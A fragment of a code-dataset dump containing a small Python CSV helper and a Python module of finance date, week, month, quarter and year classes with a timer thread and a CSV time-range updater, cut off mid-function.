super().__init__(converter)\n","sub_path":"src/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"414403145","text":"import csv\nimport re\n\n\ndef read():\n with open('aa.csv', 'r', encoding='utf8') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n title,link,*rest=row\n host, href = link.rsplit('/', 1)\n chapter_num = re.search('第(\\d+)話', title).groups()[0]\n print(f'move {href} {chapter_num:0>6}')\n print(', '.join(row))\n\ndef write():\n # writer\n import csv\n with open('csv/some.csv', 'w') as csvfile:\n header_columns = ['word', 'count', 'timestamp']\n writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n writer.writeheader()\n writer. writerow({\n \"count\": count,\n \"word\": word,\n \"timestamp\": timestamp\n })\n","sub_path":"python_01/csv_operate.py","file_name":"csv_operate.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295760514","text":"import re\nimport time\nimport threading\nimport calendar\nfrom datetime import datetime, date, timedelta\nimport math\nimport collections\nimport common_definition as CMN_DEF\nfrom libs.common.common_variable import GlobalVar as GV\nimport common_function as CMN_FUNC\n\nMonthTuple = collections.namedtuple('MonthTuple', ('year', 'month'))\nQuarterTuple = collections.namedtuple('QuarterTuple', ('year', 'quarter'))\nTimeDurationTuple = collections.namedtuple('TimeDurationTuple', ('time_duration_start', 'time_duration_end'))\nScrapyClassTimeDurationTuple = collections.namedtuple('ScrapyClassTimeDurationTuple', ('scrapy_class_index', 'time_duration_type', 'time_duration_start', 'time_duration_end'))\nScrapyClassCompanyTimeDurationTuple = collections.namedtuple('ScrapyClassCompanyTimeDurationTuple', ('scrapy_class_index', 'company_code_number', 'time_duration_type', 'time_duration_start', 'time_duration_end'))\n\nsingleton_thread_lock = threading.Lock()\n\n\nclass Singleton:\n \"\"\"\n A non-thread-safe helper class to ease implementing singletons.\n This should be used as a decorator -- not a metaclass -- to the class that should be a singleton.\n\n The decorated class can define one `__init__` function that takes only the `self` argument. Other than that, there are\n no restrictions that apply to the decorated class.\n\n To get the singleton instance, use the `Instance` method. Trying to use `__call__` will result in a `TypeError` being raised.\n\n Limitations: The decorated class cannot be inherited from.\n\n \"\"\"\n\n def __init__(self, decorated):\n self._decorated = decorated\n\n\n def Instance(self, cfg=None):\n \"\"\"\n Returns the singleton instance. Upon its first call, it creates a\n new instance of the decorated class and calls its `__init__` method.\n On all subsequent calls, the already created instance is returned.\n\n \"\"\"\n try:\n return self._instance\n except AttributeError:\n with singleton_thread_lock:\n try:\n return self._instance\n except AttributeError:\n # import pdb; pdb.set_trace()\n self._instance = self._decorated() # Call __init__() of the class\n if hasattr(self._instance, \"initialize\"):\n if cfg is None:\n self._instance.initialize()\n else:\n self._instance.initialize(**cfg)\n return self._instance\n\n\n def __call__(self):\n raise TypeError('Singletons must be accessed through Instance()')\n\n\n def __instancecheck__(self, inst):\n return isinstance(inst, self._decorated)\n\n#############################################################################################\n\nclass FinanceTimeBase(object):\n\n def __init__(self):\n self.year = None\n self.republic_era_year = None\n pass\n\n\n def to_string(self):\n raise NotImplementedError\n\n\n def get_value(self):\n raise NotImplementedError\n\n\n def get_value_tuple(self):\n raise NotImplementedError\n\n\n def check_continous_time_duration(self, another_time_duration):\n raise NotImplementedError\n\n\n def get_year(self):\n assert (self.year is not None), \"year value should NOT be None\"\n return self.year\n\n\n def get_republic_era_year(self):\n assert (self.republic_era_year is not None), \"republic_era_year value should NOT be None\"\n return self.republic_era_year\n\n\n def setup_year_value(self, year_value):\n if CMN_FUNC.is_republic_era_year(year_value):\n self.republic_era_year = int(year_value)\n self.year = self.republic_era_year + CMN_DEF.REPUBLIC_ERA_YEAR_OFFSET\n else:\n self.year = int(year_value)\n self.republic_era_year = self.year - CMN_DEF.REPUBLIC_ERA_YEAR_OFFSET\n\n\n def check_continous_time_duration(self, another_time_duration):\n return CMN_FUNC.is_continous_time_duration(self, another_time_duration)\n\n\n @staticmethod\n def get_time_unit_type():\n # \"\"\"IMPORTANT: This is a static method, override it with @staticmethod !\"\"\"\n raise NotImplementedError\n\n\n @classmethod\n def from_string(cls, time_string):\n # \"\"\"IMPORTANT: This is a class method, override it with @classmethod !\"\"\"\n raise NotImplementedError\n\n\n @staticmethod\n def from_time_string(time_string, time_unit=None):\n time_obj = None\n # import pdb; pdb.set_trace()\n if time_unit is None:\n# Detect time unit from the time string format\n if CMN_FUNC.is_date_str_format(time_string):\n time_obj = FinanceDate.from_string(time_string)\n elif CMN_FUNC.is_week_str_format(time_string):\n time_obj = FinanceWeek.from_string(time_string)\n elif CMN_FUNC.is_month_str_format(time_string):\n time_obj = FinanceMonth.from_string(time_string)\n elif CMN_FUNC.is_quarter_str_format(time_string):\n time_obj = FinanceQuarter.from_string(time_string)\n elif CMN_FUNC.is_year_str_format(time_string):\n time_obj = FinanceYear.from_string(time_string)\n else:\n raise ValueError(\"Unknown time format: %s\" % time_string)\n else:\n if time_unit == CMN_DEF.DATA_TIME_UNIT_DAY:\n time_obj = FinanceDate(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_WEEK:\n time_obj = FinanceWeek(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_MONTH:\n time_obj = FinanceMonth(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_QUARTER:\n time_obj = FinanceQuarter(time_string)\n elif time_unit == CMN_DEF.DATA_TIME_UNIT_YEAR:\n time_obj = FinanceYear(time_string)\n else:\n raise ValueError(\"Unsupport time unit[%d] for transform\" % time_unit)\n return time_obj\n\n\n # @staticmethod\n # def date_str_to_time_obj(date_string, time_unit):\n # CMN_FUNC.check_date_str_format(time_string)\n # time_obj = None\n # # import pdb; pdb.set_trace()\n # if time_unit == CMN_DEF.DATA_TIME_UNIT_WEEK:\n # time_obj = CMN.CLS.FinanceMonth(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_MONTH:\n # time_obj = CMN.CLS.FinanceMonth(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_QUARTER:\n # time_obj = CMN.CLS.FinanceQuarter(time_str)\n # elif time_unit == CMN_DEF.DATA_TIME_UNIT_YEAR:\n # time_obj = CMN.CLS.FinanceYear(time_str)\n # else:\n # raise ValueError(\"Unsupport time unit[%d] for transform\" % time_unit)\n # return time_obj\n\n\n\n def __str__(self):\n return self.to_string()\n\n\n def __lt__(self, other):\n return self.get_value() < other.get_value()\n\n\n def __le__(self, other):\n return self.get_value() <= other.get_value()\n\n\n def __eq__(self, other):\n return self.get_value() == other.get_value()\n\n\n def __ne__(self, other):\n return self.get_value() != other.get_value()\n\n\n def __gt__(self, other):\n return self.get_value() > other.get_value()\n\n\n def __ge__(self, other):\n return self.get_value() >= other.get_value()\n\n\nclass FinanceDate(FinanceTimeBase):\n\n today_finance_date = None\n last_finance_date = None\n def __init__(self, *args):\n super(FinanceDate, self).__init__()\n self.month = None # range: 1 - 12\n self.day = None # range: 1 - last date of month\n self.date_str = None\n self.datetime_cfg = None\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_date_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.month = int(mobj.group(2))\n self.day = int(mobj.group(3))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceDate):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.month = args[0].month\n self.day = args[0].day\n else:\n format_unsupport = True\n elif len(args) == 3:\n for index in range(3):\n if type(args[index]) is not int:\n format_unsupport = True\n self.setup_year_value(args[0])\n # self.year = args[0]\n self.month = args[1]\n self.day = args[2]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceDate, due to: %s\" % str(e))\n# Check value range\n FinanceDate.check_value_range(self.year, self.month, self.day)\n\n\n @staticmethod\n def check_value_range(year, month, day):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Month Range\n CMN_FUNC.check_month_range(month)\n# Check Day Range\n CMN_FUNC.check_day_range(day, year, month)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_DAY\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n @classmethod\n def get_today_finance_date(cls):\n if cls.today_finance_date is None:\n cls.today_finance_date = FinanceDate(datetime.today())\n return cls.today_finance_date\n\n\n @classmethod\n def get_last_finance_date(cls):\n if cls.last_finance_date is None:\n today_data_exist_hour = CMN_DEF.TODAY_DATA_EXIST_HOUR # if GV.IS_FINANCE_MARKET_MODE else CMN_DEF.TODAY_STOCK_DATA_EXIST_HOUR\n today_data_exist_minute = CMN_DEF.TODAY_DATA_EXIST_MINUTE # if GV.IS_FINANCE_MARKET_MODE else CMN_DEF.TODAY_STOCK_DATA_EXIST_HOUR\n cls.last_finance_date = CMN_FUNC.get_last_url_data_date(today_data_exist_hour, today_data_exist_minute) \n return cls.last_finance_date\n\n\n def __add__(self, day_delta):\n # if not isinstance(delta, timedelta):\n # raise TypeError('The type[%s] of the other variable is NOT timedelta' % type(delta))\n if not isinstance(day_delta, int):\n raise TypeError('The type[%s] of the day_delta argument is NOT int' % type(day_delta))\n return FinanceDate(self.to_datetime() + timedelta(days = day_delta))\n\n\n def __sub__(self, day_delta):\n # if not isinstance(delta, timedelta):\n # raise TypeError('The type[%s] of the other variable is NOT timedelta' % type(delta))\n if not isinstance(day_delta, int):\n raise TypeError('The type[%s] of the day_delta argument is NOT int' % type(day_delta))\n return FinanceDate(self.to_datetime() - timedelta(days = day_delta))\n\n\n def to_string(self):\n if self.date_str is None:\n self.date_str = CMN_FUNC.transform_date_str(self.year, self.month, self.day)\n return self.date_str\n\n\n def get_value(self):\n return (self.year << 12 | self.month << 8 | self.day)\n\n\n def get_value_tuple(self):\n return (self.year, self.month, self.day)\n\n\n def to_datetime(self):\n if self.datetime_cfg is None:\n self.datetime_cfg = datetime(self.year, self.month, self.day)\n return self.datetime_cfg\n\n\n @staticmethod\n def is_same_month(finance_date1, finance_date2):\n return (True if FinanceMonth(finance_date1.year, finance_date1.month) == FinanceMonth(finance_date2.year, finance_date2.month) else False)\n\n\nclass FinanceWeek(FinanceTimeBase):\n\n @classmethod\n def date_to_weekofyear(cls, year, month, day):\n year, weekofyear, weekday = date(year, month, day).isocalendar()\n return (year, weekofyear, weekday)\n\n\n @classmethod\n def weekofyear_to_date(cls, year, weekofyear, weekday=0):\n# The first day of the week '0': Sunday \n# The second day of the week '1': Monday\n# ...\n # import pdb; pdb.set_trace()\n week_str = CMN_FUNC.transform_week_str(year, weekofyear) + '-%d' % weekday\n date_obj = datetime.strptime(week_str, \"%Yw%W-%w\")\n return (date_obj.year, date_obj.month, date_obj.day)\n\n\n @classmethod\n def get_finance_week_from_date(cls, *week_args):\n \"\"\" Find the finance week due to the specific finance date\"\"\"\n \n year = None\n month = None\n day = None\n if isinstance(week_args[0], FinanceDate):\n pass\n elif isinstance(week_args[0], int) and len(week_args) == 3:\n pass\n else:\n raise ValueError(\"UnSupport input argument: %s\" % week_args)\n return cls(*week_args)\n\n\n def __init__(self, *args):\n super(FinanceWeek, self).__init__()\n self.year = None # range: 2000 - 2099\n self.weekofyear = None\n self.weekday = 0\n self.week_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n if CMN_FUNC.is_date_str_format(args[0]):\n mobj = CMN_FUNC.check_date_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n month = int(mobj.group(2))\n day = int(mobj.group(3))\n _, self.weekofyear, self.weekday = self.date_to_weekofyear(self.year, month, day)\n elif CMN_FUNC.is_week_str_format(args[0]):\n mobj = CMN_FUNC.check_week_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n self.weekofyear = int(mobj.group(2)) \n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceDate):\n self.setup_year_value(args[0].year)\n _, self.weekofyear, self.weekday = self.date_to_weekofyear(self.year, args[0].month, args[0].day)\n elif isinstance(args[0], FinanceWeek): \n self.year = args[0].year\n self.weekofyear = args[0].weekofyear\n self.weekday = args[0].weekday\n else:\n format_unsupport = True\n elif len(args) == 2:\n if isinstance(args[0], int):\n self.setup_year_value(args[0])\n self.weekofyear = args[1]\n else:\n format_unsupport = True\n elif len(args) == 3:\n if isinstance(args[0], int):\n self.setup_year_value(args[0])\n _, self.weekofyear, self.weekday = self.date_to_weekofyear(self.year, args[1], args[2])\n else:\n format_unsupport = True\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceYear, due to: %s\" % str(e))\n# Check value range\n CMN_FUNC.check_year_range(self.year)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_WEEK\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __add__(self, week_delta):\n if not isinstance(week_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(week_delta))\n year, month, day = self.weekofyear_to_date(self.year, self.weekofyear, self.weekday)\n new_datetime = datetime(year, month, day) + timedelta(days = week_delta * 7)\n return FinanceWeek(new_datetime.year, new_datetime.month, new_datetime.day)\n\n\n def __sub__(self, week_delta):\n if not isinstance(week_delta, int):\n raise TypeError('The type[%s] of the week_delta argument is NOT int' % type(week_delta))\n year, month, day = self.weekofyear_to_date(self.year, self.weekofyear, self.weekday)\n new_datetime = datetime(year, month, day) - timedelta(days = week_delta * 7)\n return FinanceWeek(new_datetime.year, new_datetime.month, new_datetime.day)\n\n\n def to_string(self):\n if self.week_str is None:\n self.week_str = CMN_FUNC.transform_week_str(self.year, self.weekofyear)\n return self.week_str\n\n\n def get_value(self):\n return (self.year << 3 | self.weekofyear)\n\n\n def get_value_tuple(self):\n return (self.year, self.weekofyear,)\n\n\nclass FinanceMonth(FinanceTimeBase):\n\n @classmethod\n def get_finance_month_from_date(cls, *date_args):\n \"\"\" Find the finance month due to the specific finance date\"\"\"\n \n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n\n return cls(finance_date.year, finance_date.month)\n\n\n def __init__(self, *args):\n super(FinanceMonth, self).__init__()\n self.month = None # range: 1 - 12\n self.month_str = None\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_month_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.month = int(mobj.group(2))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceMonth):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.month = args[0].month\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if type(args[index]) is not int:\n format_unsupport = True\n self.setup_year_value(args[0])\n # self.year = args[0]\n self.month = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceMonth, due to: %s\" % str(e))\n# Check value range\n FinanceMonth.check_value_range(self.year, self.month)\n\n\n @staticmethod\n def check_value_range(year, month):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Month Range\n CMN_FUNC.check_month_range(month)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_MONTH\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __to_month_index(self):\n return self.year * 12 + self.month - 1\n\n\n def __from_month_index_to_value(self, month_index):\n # year = month_index / 12\n # month = month_index % 12 + 1\n return MonthTuple(month_index / 12, month_index % 12 + 1)\n\n\n def __add__(self, month_delta):\n if not isinstance(month_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(month_delta))\n\n new_month_index = self.__to_month_index() + month_delta\n new_month_tuple = self.__from_month_index_to_value(new_month_index)\n return FinanceMonth(new_month_tuple.year, new_month_tuple.month)\n\n\n def __sub__(self, month_delta):\n if not isinstance(month_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(month_delta))\n\n new_month_index = self.__to_month_index() - month_delta\n new_month_tuple = self.__from_month_index_to_value(new_month_index)\n return FinanceMonth(new_month_tuple.year, new_month_tuple.month)\n\n\n def to_string(self):\n if self.month_str is None:\n self.month_str = CMN_FUNC.transform_month_str(self.year, self.month)\n return self.month_str\n\n\n def get_value(self):\n return (self.year << 4 | self.month)\n\n\n def get_value_tuple(self):\n return (self.year, self.month)\n\n def get_last_date_of_month(self):\n return calendar.monthrange(self.year, self.month)[1]\n\n\nclass FinanceQuarter(FinanceTimeBase):\n\n ANNUAL_REPORT_MONTH = 3\n ANNUAL_REPORT_DAY = 31\n Q1_QUARTERLY_REPORT_MONTH = 5\n Q1_QUARTERLY_REPORT_DAY = 15\n Q2_QUARTERLY_REPORT_MONTH = 8\n Q2_QUARTERLY_REPORT_DAY = 14\n Q3_QUARTERLY_REPORT_MONTH = 11\n Q3_QUARTERLY_REPORT_DAY = 14\n\n @classmethod\n def __get_statement_release_date_list(cls, year):\n statement_release_date_list = [\n FinanceDate(year, cls.ANNUAL_REPORT_MONTH, cls.ANNUAL_REPORT_DAY),\n FinanceDate(year, cls.Q1_QUARTERLY_REPORT_MONTH, cls.Q1_QUARTERLY_REPORT_DAY),\n FinanceDate(year, cls.Q2_QUARTERLY_REPORT_MONTH, cls.Q2_QUARTERLY_REPORT_DAY),\n FinanceDate(year, cls.Q3_QUARTERLY_REPORT_MONTH, cls.Q3_QUARTERLY_REPORT_DAY), \n ]\n return statement_release_date_list\n\n\n @classmethod\n def get_start_finance_quarter_from_date(cls, *date_args):\n \"\"\" Find the nearest start finance qaurter due to the specific finance date\"\"\"\n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n statement_release_date_list = cls.__get_statement_release_date_list(finance_date.year)\n finance_quarter = None\n if finance_date <= statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 4)\n elif statement_release_date_list[1] >= finance_date > statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year, 1)\n elif statement_release_date_list[2] >= finance_date > statement_release_date_list[1]:\n finance_quarter = FinanceQuarter(finance_date.year, 2)\n elif statement_release_date_list[3] >= finance_date > statement_release_date_list[2]:\n finance_quarter = FinanceQuarter(finance_date.year, 3)\n elif finance_date >= statement_release_date_list[3]:\n finance_quarter = FinanceQuarter(finance_date.year, 4)\n else:\n raise ValueError(\"Fail to transform the finance date[%s] to quarter\" % finance_date)\n return finance_quarter\n\n\n @classmethod\n def get_end_finance_quarter_from_date(cls, *date_args):\n \"\"\" Find the nearest end finance qaurter due to the specific finance date\"\"\"\n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n finance_date = FinanceDate(*date_args)\n statement_release_date_list = cls.__get_statement_release_date_list(finance_date.year)\n finance_quarter = None\n if finance_date < statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 3)\n elif statement_release_date_list[1] > finance_date >= statement_release_date_list[0]:\n finance_quarter = FinanceQuarter(finance_date.year - 1, 4)\n elif statement_release_date_list[2] > finance_date >= statement_release_date_list[1]:\n finance_quarter = FinanceQuarter(finance_date.year, 1)\n elif statement_release_date_list[3] > finance_date >= statement_release_date_list[2]:\n finance_quarter = FinanceQuarter(finance_date.year, 2)\n elif finance_date >= statement_release_date_list[3]:\n finance_quarter = FinanceQuarter(finance_date.year, 3)\n else:\n raise ValueError(\"Fail to transform the end finance date[%s] to quarter\" % finance_date)\n return finance_quarter\n\n\n def __init__(self, *args):\n super(FinanceQuarter, self).__init__()\n self.quarter = None\n self.quarter_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_quarter_str_format(args[0])\n self.setup_year_value(mobj.group(1))\n # self.year = mobj.group(1)\n self.quarter = int(mobj.group(2))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceQuarter):\n self.setup_year_value(args[0].year)\n # self.year = args[0].year\n self.quarter = (int)(math.ceil(args[0].month / 3.0))\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if type(args[index]) is not int:\n format_unsupport = True\n self.year = args[0]\n self.quarter = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceQuarter, due to: %s\" % str(e))\n# Check value Range\n FinanceQuarter.check_value_range(self.year, self.quarter)\n\n\n @staticmethod\n def check_value_range(year, quarter):\n# Check Year Range\n CMN_FUNC.check_year_range(year)\n# Check Quarter Range\n CMN_FUNC.check_quarter_range(quarter)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_QUARTER\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __to_quarter_index(self):\n return self.year * 4 + self.quarter - 1\n\n\n def __from_quarter_index_to_value(self, quarter_index):\n return QuarterTuple(quarter_index / 4, quarter_index % 4 + 1)\n\n\n def __add__(self, quarter_delta):\n if not isinstance(quarter_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(quarter_delta))\n\n new_quarter_index = self.__to_quarter_index() + quarter_delta\n new_quarter_tuple = self.__from_quarter_index_to_value(new_quarter_index)\n return FinanceQuarter(new_quarter_tuple.year, new_quarter_tuple.quarter)\n\n\n def __sub__(self, quarter_delta):\n if not isinstance(quarter_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(quarter_delta))\n\n new_quarter_index = self.__to_quarter_index() - quarter_delta\n new_quarter_tuple = self.__from_quarter_index_to_value(new_quarter_index)\n return FinanceQuarter(new_quarter_tuple.year, new_quarter_tuple.quarter)\n\n\n def to_string(self):\n if self.quarter_str is None:\n self.quarter_str = CMN_FUNC.transform_quarter_str(self.year, self.quarter)\n return self.quarter_str\n\n\n def get_value(self):\n return (self.year << 3 | self.quarter)\n\n\n def get_value_tuple(self):\n return (self.year, self.quarter)\n\n\nclass FinanceYear(FinanceTimeBase):\n\n @classmethod\n def get_finance_year_from_date(cls, *date_args):\n \"\"\" Find the finance year due to the specific finance date\"\"\"\n \n finance_date = None\n if isinstance(date_args[0], FinanceDate):\n finance_date = date_args[0]\n else:\n raise ValueError(\"UnSupport input argument: %s\" % date_args)\n return cls(finance_date.year)\n\n\n def __init__(self, *args):\n super(FinanceYear, self).__init__()\n self.year = None # range: 2000 - 2099\n self.year_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n time_cfg = None\n if isinstance(args[0], str):\n mobj = CMN_FUNC.check_year_str_format(args[0])\n self.setup_year_value(mobj.group(0))\n elif isinstance(args[0], datetime) or isinstance(args[0], FinanceMonth):\n self.setup_year_value(args[0].year)\n else:\n format_unsupport = True\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceYear, due to: %s\" % str(e))\n# Check value range\n CMN_FUNC.check_year_range(self.year)\n\n\n @staticmethod\n def get_time_unit_type():\n return CMN_DEF.DATA_TIME_UNIT_YEAR\n\n\n @classmethod\n def from_string(cls, time_string):\n return cls(time_string)\n\n\n def __add__(self, year_delta):\n if not isinstance(year_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(year_delta))\n new_year = self.year + year_delta\n return FinanceYear(year)\n\n\n def __sub__(self, year_delta):\n if not isinstance(year_delta, int):\n raise TypeError('The type[%s] of the delta argument is NOT int' % type(year_delta))\n new_year = self.year - year_delta\n return FinanceYear(year)\n\n\n def to_string(self):\n if self.year_str is None:\n self.year_str = \"%d\" % self.year\n return self.year_str\n\n\n def get_value(self):\n return self.year\n\n\n def get_value_tuple(self):\n return (self.year,)\n\n\nclass FinanceTimeRange(object):\n\n def __init__(self, *args):\n self.time_start = None\n self.time_end = None\n self.time_range_str = None\n # import pdb; pdb.set_trace()\n try:\n format_unsupport = False\n if len(args) == 1:\n if isinstance(args[0], str):\n (self.time_start, self.time_end) = CMN_FUNC.parse_time_duration_range_str_to_object(args[0])\n else:\n format_unsupport = True\n elif len(args) == 2:\n for index in range(2):\n if not isinstance(args[index], FinanceTimeBase):\n format_unsupport = True\n self.time_start = args[0]\n self.time_end = args[1]\n else:\n format_unsupport = True\n if format_unsupport:\n raise ValueError(\"Unsupport argument format: %s\" % [type(data) for data in args])\n except ValueError as e:\n raise e\n except Exception as e:\n raise Exception(\"Exception occurs in FinanceTimeRange, due to: %s\" % str(e))\n\n\n def is_greater_than_time_start(self, finance_time):\n return False if ((self.time_start is not None) and (finance_time < self.time_start)) else True\n\n\n def is_less_than_time_end(self, finance_time):\n return False if ((self.time_end is not None) and (finance_time > self.time_end)) else True\n\n\n# class ParseURLDataType:\n\n# def __init__(self):\n# # self.parse_url_data_type = None\n# pass\n\n\n# def get_type(self):\n# raise NotImplementedError\n\n\n# class ParseURLDataByBS4(ParseURLDataType):\n\n# def __init__(self, encoding, select_flag):\n# # self.parse_url_data_type = CMN.PARSE_URL_DATA_BY_BS4\n# self.encoding = encoding\n# self.select_flag = select_flag\n\n\n# def get_type(self):\n# return CMN.PARSE_URL_DATA_BY_BS4\n\n\n# class ParseURLDataByJSON(ParseURLDataType):\n\n# def __init__(self, data_field_name):\n# # self.parse_url_data_type = CMN.PARSE_URL_DATA_BY_BS4\n# self.data_field_name = data_field_name\n\n\n# def get_type(self):\n# return CMN.PARSE_URL_DATA_BY_JSON\n\n\nclass FinanceTimerThread(threading.Thread):\n\n def __init__(self, **cfg):\n super(FinanceTimerThread, self).__init__()\n self.daemon = True\n self.xcfg = {\n \"func_ptr\": None,\n \"interval\": 30,\n }\n self.xcfg.update(cfg)\n # self.exit = False\n # if self.xcfg[\"func_ptr\"] is None:\n # raise ValueError(\"func_ptr should NOT be None\")\n self.exit_event = threading.Event()\n self.interval = self.xcfg[\"interval\"]\n self.func_ptr = None\n self.func_args = None\n self.func_kwargs = None\n self.start_time = None\n\n\n def start_timer(self, func_ptr, *args, **kwargs):\n self.func_ptr = func_ptr\n self.func_args = args\n self.func_kwargs = kwargs\n # self.start_time = time()\n # self.exit = True\n self.start()\n\n\n def stop_timer(self, timeout=5):\n # self.exit = True\n self.exit_event.set( )\n threading.Thread.join(self, timeout)\n\n\n def run(self):\n while not self.exit_event.isSet( ):\n self.func_ptr(*self.func_args, **self.func_kwargs)\n self.exit_event.wait(self.interval)\n\n\n#############################################################################################\n\nclass CSVTimeRangeUpdate(object):\n \n CSV_APPEND_NONE = 0 # No new web data to append\n CSV_APPEND_BEFORE = 1 # new web data will be appended in front of the old csv data\n CSV_APPEND_AFTER = 2 # new web data will be appended in back of the old csv data\n # CSV_APPEND_BOTH = 3 # new web data will be appended in front and back(both) of the old csv data\n\n @classmethod\n def get_init_csv_time_duration_update(cls, time_duration_start, time_duration_end):\n # import pdb; pdb.set_trace()\n# If it's time first time to write the data from web to CSV ......\n web2csv_time_duration_update = cls()\n web2csv_time_duration_update.NewCSVStart = web2csv_time_duration_update.NewWebStart = time_duration_start\n web2csv_time_duration_update.NewCSVEnd = web2csv_time_duration_update.NewWebEnd = time_duration_end\n web2csv_time_duration_update.AppendDirection = cls.CSV_APPEND_AFTER\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update.NewWebStart, web2csv_time_duration_update.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update,),)\n\n\n @classmethod\n def get_extended_csv_time_duration_update(cls, time_duration_start, time_duration_end, csv_old_time_duration_tuple):\n # import pdb; pdb.set_trace()\n# Adjust the time duration, ignore the data which already exist in the finance data folder\n# I assume that the time duration between the csv data and new data should be consecutive\n# Two cases which the original time range can be extended successfully: \n# (1) The new time range overlaps the original one\n# (2) The new time range fully covers the original one\n overlap_case = CMN_FUNC.get_time_range_overlap_case(time_duration_start, time_duration_end, csv_old_time_duration_tuple.time_duration_start, csv_old_time_duration_tuple.time_duration_end)\n new_csv_extension_time_duration = None\n web2csv_time_duration_update_before = None\n web2csv_time_duration_update_after = None\n if overlap_case == CMN_DEF.TIME_OVERLAP_COVERED:\n# # All csv data already exists, no need to update the new data\n# g_logger.debug(\"The time duration[%s:%s] of the CSV data[%s] already exist ......\" % (time_duration_start, time_duration_end, CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX]))\n# new_csv_extension_time_duration = None\n# return None\n return (new_csv_extension_time_duration, None,)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_BEFORE:\n# The new time range is extended before the start side of the original time range\n web2csv_time_duration_update_before = cls()\n web2csv_time_duration_update_before.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_before.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_before.NewWebStart = time_duration_start\n web2csv_time_duration_update_before.NewWebEnd = web2csv_time_duration_update_before.OldCSVStart - 1\n 